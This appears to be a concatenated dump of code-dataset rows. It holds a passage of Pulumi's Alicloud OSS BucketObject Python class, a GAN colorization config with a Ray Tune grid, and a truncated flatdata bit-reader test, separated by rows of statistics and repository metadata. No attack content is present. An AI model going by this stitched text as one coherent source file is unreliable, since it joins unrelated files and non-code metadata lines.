:param pulumi.Input[str] acl: The [canned ACL](https://www.alibabacloud.com/help/doc-detail/52284.htm) to apply. Defaults to "private".
:param pulumi.Input[str] bucket: The name of the bucket to put the file in.
:param pulumi.Input[str] cache_control: Specifies caching behavior along the request/reply chain. Read [RFC2616 Cache-Control](https://www.ietf.org/rfc/rfc2616.txt) for further details.
:param pulumi.Input[str] content: The literal content being uploaded to the bucket.
:param pulumi.Input[str] content_disposition: Specifies presentational information for the object. Read [RFC2616 Content-Disposition](https://www.ietf.org/rfc/rfc2616.txt) for further details.
:param pulumi.Input[str] content_encoding: Specifies what content encodings have been applied to the object and thus what decoding mechanisms must be applied to obtain the media-type referenced by the Content-Type header field. Read [RFC2616 Content-Encoding](https://www.ietf.org/rfc/rfc2616.txt) for further details.
:param pulumi.Input[str] content_md5: The MD5 value of the content. Read [MD5](https://www.alibabacloud.com/help/doc-detail/31978.htm) for the computation method.
:param pulumi.Input[str] content_type: A standard MIME type describing the format of the object data, e.g. application/octet-stream. Any valid MIME type is accepted for this input.
:param pulumi.Input[str] expires: Specifies the expiry date for the request/response. Read [RFC2616 Expires](https://www.ietf.org/rfc/rfc2616.txt) for further details.
:param pulumi.Input[str] key: The name of the object once it is in the bucket.
:param pulumi.Input[str] kms_key_id: Specifies the primary key managed by KMS. This parameter is valid when the value of `server_side_encryption` is set to KMS.
:param pulumi.Input[str] server_side_encryption: Specifies server-side encryption of the object in OSS. Valid values are `AES256`, `KMS`. Default value is `AES256`.
:param pulumi.Input[str] source: The path to the source file being uploaded to the bucket.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: BucketObjectArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides a resource to put an object (content or file) into an OSS bucket.
## Example Usage
### Uploading a file to a bucket
```python
import pulumi
import pulumi_alicloud as alicloud
object_source = alicloud.oss.BucketObject("object-source",
bucket="your_bucket_name",
key="new_object_key",
source="path/to/file")
```
### Uploading content to a bucket
```python
import pulumi
import pulumi_alicloud as alicloud
example = alicloud.oss.Bucket("example",
bucket="your_bucket_name",
acl="public-read")
object_content = alicloud.oss.BucketObject("object-content",
bucket=example.bucket,
key="new_object_key",
content="the content that you want to upload.")
```
:param str resource_name: The name of the resource.
:param BucketObjectArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(BucketObjectArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
acl: Optional[pulumi.Input[str]] = None,
bucket: Optional[pulumi.Input[str]] = None,
cache_control: Optional[pulumi.Input[str]] = None,
content: Optional[pulumi.Input[str]] = None,
content_disposition: Optional[pulumi.Input[str]] = None,
content_encoding: Optional[pulumi.Input[str]] = None,
content_md5: Optional[pulumi.Input[str]] = None,
content_type: Optional[pulumi.Input[str]] = None,
expires: Optional[pulumi.Input[str]] = None,
key: Optional[pulumi.Input[str]] = None,
kms_key_id: Optional[pulumi.Input[str]] = None,
server_side_encryption: Optional[pulumi.Input[str]] = None,
source: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = BucketObjectArgs.__new__(BucketObjectArgs)
__props__.__dict__["acl"] = acl
if bucket is None and not opts.urn:
raise TypeError("Missing required property 'bucket'")
__props__.__dict__["bucket"] = bucket
__props__.__dict__["cache_control"] = cache_control
__props__.__dict__["content"] = content
__props__.__dict__["content_disposition"] = content_disposition
__props__.__dict__["content_encoding"] = content_encoding
__props__.__dict__["content_md5"] = content_md5
__props__.__dict__["content_type"] = content_type
__props__.__dict__["expires"] = expires
if key is None and not opts.urn:
raise TypeError("Missing required property 'key'")
__props__.__dict__["key"] = key
__props__.__dict__["kms_key_id"] = kms_key_id
__props__.__dict__["server_side_encryption"] = server_side_encryption
__props__.__dict__["source"] = source
__props__.__dict__["content_length"] = None
__props__.__dict__["etag"] = None
__props__.__dict__["version_id"] = None
super(BucketObject, __self__).__init__(
'alicloud:oss/bucketObject:BucketObject',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
acl: Optional[pulumi.Input[str]] = None,
bucket: Optional[pulumi.Input[str]] = None,
cache_control: Optional[pulumi.Input[str]] = None,
content: Optional[pulumi.Input[str]] = None,
content_disposition: Optional[pulumi.Input[str]] = None,
content_encoding: Optional[pulumi.Input[str]] = None,
content_length: Optional[pulumi.Input[str]] = None,
content_md5: Optional[pulumi.Input[str]] = None,
content_type: Optional[pulumi.Input[str]] = None,
etag: Optional[pulumi.Input[str]] = None,
expires: Optional[pulumi.Input[str]] = None,
key: Optional[pulumi.Input[str]] = None,
kms_key_id: Optional[pulumi.Input[str]] = None,
server_side_encryption: Optional[pulumi.Input[str]] = None,
source: Optional[pulumi.Input[str]] = None,
version_id: Optional[pulumi.Input[str]] = None) -> 'BucketObject':
"""
Get an existing BucketObject resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] acl: The [canned ACL](https://www.alibabacloud.com/help/doc-detail/52284.htm) to apply. Defaults to "private".
:param pulumi.Input[str] bucket: The name of the bucket to put the file in.
:param pulumi.Input[str] cache_control: Specifies caching behavior along the request/reply chain. Read [RFC2616 Cache-Control](https://www.ietf.org/rfc/rfc2616.txt) for further details.
:param pulumi.Input[str] content: The literal content being uploaded to the bucket.
:param pulumi.Input[str] content_disposition: Specifies presentational information for the object. Read [RFC2616 Content-Disposition](https://www.ietf.org/rfc/rfc2616.txt) for further details.
:param pulumi.Input[str] content_encoding: Specifies what content encodings have been applied to the object and thus what decoding mechanisms must be applied to obtain the media-type referenced by the Content-Type header field. Read [RFC2616 Content-Encoding](https://www.ietf.org/rfc/rfc2616.txt) for further details.
:param pulumi.Input[str] content_length: The content length of the request.
:param pulumi.Input[str] content_md5: The MD5 value of the content. Read [MD5](https://www.alibabacloud.com/help/doc-detail/31978.htm) for the computation method.
:param pulumi.Input[str] content_type: A standard MIME type describing the format of the object data, e.g. application/octet-stream. Any valid MIME type is accepted for this input.
:param pulumi.Input[str] etag: The ETag generated for the object (an MD5 sum of the object content).
:param pulumi.Input[str] expires: Specifies the expiry date for the request/response. Read [RFC2616 Expires](https://www.ietf.org/rfc/rfc2616.txt) for further details.
:param pulumi.Input[str] key: The name of the object once it is in the bucket.
:param pulumi.Input[str] kms_key_id: Specifies the primary key managed by KMS. This parameter is valid when the value of `server_side_encryption` is set to KMS.
:param pulumi.Input[str] server_side_encryption: Specifies server-side encryption of the object in OSS. Valid values are `AES256`, `KMS`. Default value is `AES256`.
:param pulumi.Input[str] source: The path to the source file being uploaded to the bucket.
:param pulumi.Input[str] version_id: A unique version ID value for the object, if bucket versioning is enabled.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _BucketObjectState.__new__(_BucketObjectState)
__props__.__dict__["acl"] = acl
__props__.__dict__["bucket"] = bucket
__props__.__dict__["cache_control"] = cache_control
__props__.__dict__["content"] = content
__props__.__dict__["content_disposition"] = content_disposition
__props__.__dict__["content_encoding"] = content_encoding
__props__.__dict__["content_length"] = content_length
__props__.__dict__["content_md5"] = content_md5
__props__.__dict__["content_type"] = content_type
__props__.__dict__["etag"] = etag
__props__.__dict__["expires"] = expires
__props__.__dict__["key"] = key
__props__.__dict__["kms_key_id"] = kms_key_id
__props__.__dict__["server_side_encryption"] = server_side_encryption
__props__.__dict__["source"] = source
__props__.__dict__["version_id"] = version_id
return BucketObject(resource_name, opts=opts, __props__=__props__)
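# A minimal usage sketch (hypothetical names; the ID format is
# provider-defined and not shown here):
#
#   existing = alicloud.oss.BucketObject.get(
#       "existing-object", id="<provider-assigned id>")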
@property
@pulumi.getter
def acl(self) -> pulumi.Output[Optional[str]]:
"""
The [canned ACL](https://www.alibabacloud.com/help/doc-detail/52284.htm) to apply. Defaults to "private".
"""
return pulumi.get(self, "acl")
@property
@pulumi.getter
def bucket(self) -> pulumi.Output[str]:
"""
The name of the bucket to put the file in.
"""
return pulumi.get(self, "bucket")
@property
@pulumi.getter(name="cacheControl")
def cache_control(self) -> pulumi.Output[Optional[str]]:
"""
Specifies caching behavior along the request/reply chain. Read [RFC2616 Cache-Control](https://www.ietf.org/rfc/rfc2616.txt) for further details.
"""
return pulumi.get(self, "cache_control")
@property
@pulumi.getter
def content(self) -> pulumi.Output[Optional[str]]:
"""
The literal content being uploaded to the bucket.
"""
return pulumi.get(self, "content")
@property
@pulumi.getter(name="contentDisposition")
def content_disposition(self) -> pulumi.Output[Optional[str]]:
"""
Specifies presentational information for the object. Read [RFC2616 Content-Disposition](https://www.ietf.org/rfc/rfc2616.txt) for further details.
"""
return pulumi.get(self, "content_disposition")
@property
@pulumi.getter(name="contentEncoding")
def content_encoding(self) -> pulumi.Output[Optional[str]]:
"""
Specifies what content encodings have been applied to the object and thus what decoding mechanisms must be applied to obtain the media-type referenced by the Content-Type header field. Read [RFC2616 Content-Encoding](https://www.ietf.org/rfc/rfc2616.txt) for further details.
"""
return pulumi.get(self, "content_encoding")
@property
@pulumi.getter(name="contentLength")
def content_length(self) -> pulumi.Output[str]:
"""
The content length of the request.
"""
return pulumi.get(self, "content_length")
@property
@pulumi.getter(name="contentMd5")
def content_md5(self) -> pulumi.Output[Optional[str]]:
"""
The MD5 value of the content. Read [MD5](https://www.alibabacloud.com/help/doc-detail/31978.htm) for the computation method.
"""
return pulumi.get(self, "content_md5")
@property
@pulumi.getter(name="contentType")
def content_type(self) -> pulumi.Output[str]:
"""
A standard MIME type describing the format of the object data, e.g. application/octet-stream. Any valid MIME type is accepted for this input.
"""
return pulumi.get(self, "content_type")
@property
@pulumi.getter
def etag(self) -> pulumi.Output[str]:
"""
The ETag generated for the object (an MD5 sum of the object content).
"""
return pulumi.get(self, "etag")
@property
@pulumi.getter
def expires(self) -> pulumi.Output[Optional[str]]:
"""
Specifies the expiry date for the request/response. Read [RFC2616 Expires](https://www.ietf.org/rfc/rfc2616.txt) for further details.
"""
return pulumi.get(self, "expires")
@property
@pulumi.getter
def key(self) -> pulumi.Output[str]:
"""
The name of the object once it is in the bucket.
"""
return pulumi.get(self, "key")
@property
@pulumi.getter(name="kmsKeyId")
def kms_key_id(self) -> pulumi.Output[Optional[str]]:
"""
Specifies the primary key managed by KMS. This parameter is valid when the value of `server_side_encryption` is set to KMS.
"""
return pulumi.get(self, "kms_key_id")
@property
@pulumi.getter(name="serverSideEncryption")
def server_side_encryption(self) -> pulumi.Output[Optional[str]]:
"""
Specifies server-side encryption of the object in OSS. Valid values are `AES256`, `KMS`. Default value is `AES256`.
"""
return pulumi.get(self, "server_side_encryption")
@property
@pulumi.getter
def source(self) -> pulumi.Output[Optional[str]]:
"""
The path to the source file being uploaded to the bucket.
"""
return pulumi.get(self, "source")
@property
@pulumi.getter(name="versionId")
def version_id(self) -> pulumi.Output[str]:
"""
A unique version ID value for the object, if bucket versioning is enabled.
"""
return pulumi.get(self, "version_id")
| 47.510563 | 326 | 0.65387 | 5,066 | 40,479 | 5.053296 | 0.047177 | 0.08207 | 0.103359 | 0.105703 | 0.927109 | 0.913516 | 0.892813 | 0.883906 | 0.880352 | 0.858516 | 0 | 0.012595 | 0.236987 | 40,479 | 851 | 327 | 47.566392 | 0.81626 | 0.390029 | 0 | 0.798768 | 1 | 0 | 0.088701 | 0.01042 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166324 | false | 0.002053 | 0.010267 | 0 | 0.277207 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
f447d0b4d6fc231761d939217a077344668ee663 | 6,614 | py | Python | src/config.py | mps-research/ImageColorizationUsingGANwithLab | e04679b173728119c0e2395eeaf086f5a36d584f | [
"MIT"
] | null | null | null | src/config.py | mps-research/ImageColorizationUsingGANwithLab | e04679b173728119c0e2395eeaf086f5a36d584f | [
"MIT"
] | null | null | null | src/config.py | mps-research/ImageColorizationUsingGANwithLab | e04679b173728119c0e2395eeaf086f5a36d584f | [
"MIT"
] | null | null | null | import torch.nn as nn
from ray import tune
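# Search space for the Lab colorization GAN. The generator below maps the
# 1-channel L plane to the 2-channel ab planes (Tanh output), the
# discriminator scores 2-channel ab inputs, and `config` at the bottom is a
# ray.tune grid over datasets, networks, and training knobs ('lambda'
# presumably weights the reconstruction term, pix2pix style).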
large_netG = {
'encoder': [
{
'in_channels': 1,
'out_channels': 64,
'kernel_size': 3,
'stride': 1,
'padding': 1,
'normalize': True,
'activation_func': nn.ReLU()
},
{
'in_channels': 64,
'out_channels': 64,
'kernel_size': 4,
'stride': 2,
'padding': 1,
'normalize': True,
'activation_func': nn.ReLU()
},
{
'in_channels': 64,
'out_channels': 128,
'kernel_size': 4,
'stride': 2,
'padding': 1,
'normalize': True,
'activation_func': nn.ReLU()
},
{
'in_channels': 128,
'out_channels': 256,
'kernel_size': 4,
'stride': 2,
'padding': 1,
'normalize': True,
'activation_func': nn.ReLU()
},
{
'in_channels': 256,
'out_channels': 512,
'kernel_size': 4,
'stride': 2,
'padding': 1,
'normalize': True,
'activation_func': nn.ReLU()
},
{
'in_channels': 512,
'out_channels': 512,
'kernel_size': 4,
'stride': 2,
'padding': 1,
'normalize': True,
'activation_func': nn.ReLU()
},
{
'in_channels': 512,
'out_channels': 512,
'kernel_size': 4,
'stride': 2,
'padding': 1,
'normalize': True,
'activation_func': nn.ReLU()
},
{
'in_channels': 512,
'out_channels': 512,
'kernel_size': 4,
'stride': 2,
'padding': 1,
'normalize': True,
'activation_func': nn.ReLU()
},
],
'decoder': [
{
'in_channels': 512,
'out_channels': 512,
'kernel_size': 4,
'stride': 2,
'padding': 1,
'normalize': True,
'activation_func': nn.ReLU()
},
{
'in_channels': 1024,
'out_channels': 512,
'kernel_size': 4,
'stride': 2,
'padding': 1,
'normalize': True,
'activation_func': nn.ReLU()
},
{
'in_channels': 1024,
'out_channels': 512,
'kernel_size': 4,
'stride': 2,
'padding': 1,
'normalize': True,
'activation_func': nn.ReLU()
},
{
'in_channels': 1024,
'out_channels': 256,
'kernel_size': 4,
'stride': 2,
'padding': 1,
'normalize': True,
'activation_func': nn.ReLU()
},
{
'in_channels': 512,
'out_channels': 128,
'kernel_size': 4,
'stride': 2,
'padding': 1,
'normalize': True,
'activation_func': nn.ReLU()
},
{
'in_channels': 256,
'out_channels': 64,
'kernel_size': 4,
'stride': 2,
'padding': 1,
'normalize': True,
'activation_func': nn.ReLU()
},
{
'in_channels': 128,
'out_channels': 64,
'kernel_size': 4,
'stride': 2,
'padding': 1,
'normalize': True,
'activation_func': nn.ReLU()
},
{
'in_channels': 128,
'out_channels': 2,
'kernel_size': 3,
'stride': 1,
'padding': 1,
'normalize': True,
'activation_func': nn.ReLU()
},
{
'in_channels': 2,
'out_channels': 2,
'kernel_size': 3,
'stride': 1,
'padding': 1,
'normalize': False,
'activation_func': nn.Tanh()
},
],
}
large_netD = {
'blocks': [
{
'in_channels': 2,
'out_channels': 64,
'kernel_size': 4,
'stride': 2,
'padding': 1,
'normalize': False,
'activation_func': nn.LeakyReLU(0.2)
},
{
'in_channels': 64,
'out_channels': 128,
'kernel_size': 4,
'stride': 2,
'padding': 1,
'normalize': True,
'activation_func': nn.LeakyReLU(0.2)
},
{
'in_channels': 128,
'out_channels': 256,
'kernel_size': 4,
'stride': 2,
'padding': 1,
'normalize': True,
'activation_func': nn.LeakyReLU(0.2)
},
{
'in_channels': 256,
'out_channels': 512,
'kernel_size': 4,
'stride': 2,
'padding': 1,
'normalize': True,
'activation_func': nn.LeakyReLU(0.2)
},
{
'in_channels': 512,
'out_channels': 1024,
'kernel_size': 4,
'stride': 2,
'padding': 1,
'normalize': True,
'activation_func': nn.LeakyReLU(0.2)
},
{
'in_channels': 1024,
'out_channels': 1024,
'kernel_size': 4,
'stride': 2,
'padding': 1,
'normalize': True,
'activation_func': nn.LeakyReLU(0.2)
},
{
'in_channels': 1024,
'out_channels': 1,
'kernel_size': 4,
'stride': 1,
'padding': 0,
'normalize': False,
'activation_func': nn.Sigmoid()
},
]
}
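# The decoder's doubled in_channels (e.g. 1024 = 512 + 512) are consistent
# with U-Net style skip concatenation between mirrored encoder/decoder
# blocks. A minimal sketch (hypothetical helper, not part of the original
# model code) of how one block dict above could be realized:
def _example_build_block(cfg, transposed=False):
    """Turn one block dict from the configs above into a layer stack."""
    conv_cls = nn.ConvTranspose2d if transposed else nn.Conv2d
    layers = [conv_cls(cfg['in_channels'], cfg['out_channels'],
                       cfg['kernel_size'], cfg['stride'], cfg['padding'])]
    if cfg['normalize']:
        layers.append(nn.BatchNorm2d(cfg['out_channels']))  # assumption: batch norm
    layers.append(cfg['activation_func'])
    return nn.Sequential(*layers)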
netGs = {
'large_netG': large_netG
}
netDs = {
'large_netD': large_netD
}
datasets = {
'places365_20220124': {
'src_dir': '/data/places365_standard',
'dst_dir': '/data/places365_20220124',
'n_classes': 3,
'n_train_samples_per_class': 3000,
'n_val_samples_per_class': 10,
}
}
config = {
'dataset': tune.grid_search(list(datasets.keys())),
'netG': tune.grid_search(list(netGs.keys())),
'netD': tune.grid_search(list(netDs.keys())),
'lrG': tune.grid_search([2e-4]),
'lrD': tune.grid_search([2e-4]),
'p': tune.grid_search([0.7]),
'lambda': tune.grid_search([30, 100, 300]),
'batch_size': 32,
}
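# Typical consumption (a sketch; the real entry point lives elsewhere in the
# repository): pass this search space to Ray Tune, e.g.
#
#   tune.run(train_colorization, config=config)
#
# where train_colorization is a hypothetical trainable function.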
| 24.864662 | 55 | 0.404596 | 572 | 6,614 | 4.461538 | 0.131119 | 0.094044 | 0.15047 | 0.172806 | 0.816614 | 0.780564 | 0.780564 | 0.770376 | 0.759796 | 0.759796 | 0 | 0.072452 | 0.451164 | 6,614 | 265 | 56 | 24.958491 | 0.630579 | 0 | 0 | 0.652174 | 0 | 0 | 0.290142 | 0.014515 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.007905 | 0 | 0.007905 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f489f09aab1d99e9faa0bca31992721b9baf4961 | 215,926 | py | Python | flatdata-py/tests/test_data_access.py | heremaps/flatdata | 42e62c00a25d9b65930c90044578a583efb6ed6d | [
"Apache-2.0"
] | 140 | 2018-01-26T21:59:38.000Z | 2022-02-17T10:23:29.000Z | flatdata-py/tests/test_data_access.py | VeaaC/flatdata | 5df78d89938dbbd1566fa85d417b9674ef402561 | [
"Apache-2.0"
] | 114 | 2018-01-26T17:49:20.000Z | 2021-11-26T13:27:08.000Z | flatdata-py/tests/test_data_access.py | VeaaC/flatdata | 5df78d89938dbbd1566fa85d417b9674ef402561 | [
"Apache-2.0"
] | 22 | 2018-01-26T16:51:24.000Z | 2021-04-27T13:32:44.000Z | from nose.tools import assert_equal
from flatdata.lib.data_access import read_value, write_value
def test_reader():
"""
The following tests were generated from their C++ counterparts. Reasoning: the
Python implementation lacks writers at the moment, and adding them requires
assurance that they will not diverge from their C++ originals.
"""
def _test_reader(buffer, offset, num_bits, is_signed, expected):
assert_equal(read_value(buffer, offset, num_bits, is_signed), expected)
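# Reading the generated cases: read_value extracts num_bits bits starting at
# bit `offset` of the little-endian byte buffer. In the first block below,
# bit 8 is the least significant bit of the second byte (\x01), so reading
# any width from 1 to 8 bits at that offset yields 1; the later blocks walk
# the set bit through offsets 7 down to 0 and widen num_bits up to 32.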
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00", 8, 8, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00", 8, 7, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00", 8, 6, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00", 8, 5, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00", 8, 4, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00", 8, 3, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00", 8, 2, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00", 8, 1, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 8, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 7, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 6, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 5, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 4, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 3, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 2, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 1, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 8, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 7, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 6, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 5, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 4, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 3, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 2, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 1, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 8, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 7, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 6, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 5, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 4, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 3, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 2, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 1, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 8, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 7, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 6, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 5, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 4, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 3, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 2, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 1, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 8, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 7, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 6, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 5, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 4, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 3, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 2, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 1, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 8, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 7, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 6, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 5, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 4, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 3, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 2, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 1, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 8, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 7, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 6, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 5, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 4, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 3, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 2, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 1, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00", 0, 8, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00", 0, 7, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00", 0, 6, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00", 0, 5, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00", 0, 4, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00", 0, 3, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00", 0, 2, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00", 0, 1, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 16, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 15, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 14, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 13, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 12, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 11, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 10, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 9, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 8, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 7, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 6, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 5, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 4, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 3, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 2, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 1, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 16, False, 1)
